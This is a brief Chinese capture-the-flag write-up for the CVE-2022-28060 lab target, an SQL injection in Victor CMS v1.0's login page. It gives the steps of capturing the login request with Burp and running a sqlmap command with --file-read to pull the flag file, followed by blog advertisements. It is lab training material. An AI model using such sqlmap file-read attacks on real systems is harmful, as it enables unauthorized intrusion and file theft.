春秋云镜 CVE-2022-28060
春秋云镜 CVE-2022-28060
靶标介绍:
Victor CMS v1.0 /includes/login.php 存在sql注入
1.打开环境之后进入该路径,看到一个登录界面
2.尝试登录,并使用burp进行抓包
3.将抓包的报文放到一个文件中
4.使用sqlmap进行爆破
1 | sqlmap -r 1.txt --file-read "/flag" --dbms mysql |
捕获该地址
1 | cat /home/wxm/.local/share/sqlmap/output/eci-2zeiq2tg2xj2vwdexjfu.cloudeci1.ichunqiu.com/files/_flag |
拿到flag
【推荐】国内首个AI IDE,深度理解中文开发场景,立即下载体验Trae
【推荐】编程新体验,更懂你的AI,立即体验豆包MarsCode编程助手
【推荐】抖音旗下AI助手豆包,你的智能百科全书,全免费不限次数
【推荐】轻量又高性能的 SSH 工具 IShell:AI 加持,快人一步
· 地球OL攻略 —— 某应届生求职总结
· 周边上新:园子的第一款马克杯温暖上架
· Open-Sora 2.0 重磅开源!
· 提示词工程——AI应用必不可少的技术
· .NET周刊【3月第1期 2025-03-02】